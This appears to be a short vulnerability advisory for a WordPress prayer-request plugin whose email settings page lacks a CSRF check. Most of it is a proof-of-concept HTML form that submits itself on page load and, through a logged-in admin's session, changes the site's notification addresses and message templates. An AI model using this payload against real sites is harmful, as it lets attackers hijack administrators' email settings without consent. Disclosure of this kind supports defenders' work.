Description The plugin does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=wpe_manage_email_settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="prayer_req_admin_email" value="[email protected]">
<input type="hidden" name="wpe_email_cc" value="[email protected]">
<input type="hidden" name="wpe_email_from" value="csrf">
<input type="hidden" name="wpe_email_user" value="[email protected]">
<input type="hidden" name="wpe_email_req_subject" value="CSRF">
<input type="hidden" name="wpe_email_req_messages" value="csrf">
<input type="hidden" name="wpe_email_praise_subject" value="csrf">
<input type="hidden" name="wpe_email_praise_messages" value="csrf">
<input type="hidden" name="wpe_email_admin_subject" value="csrf">
<input type="hidden" name="wpe_email_admin_messages" value="csrf">
<input type="hidden" name="wpe_email_prayed_subject" value="csrf">
<input type="hidden" name="wpe_email_prayed_messages" value="csrf">
<input type="hidden" name="save_entity_data" value="Save Changes">
<input type="hidden" name="operation" value="save">
<input type="submit" value="Submit">
</form>
</body>
```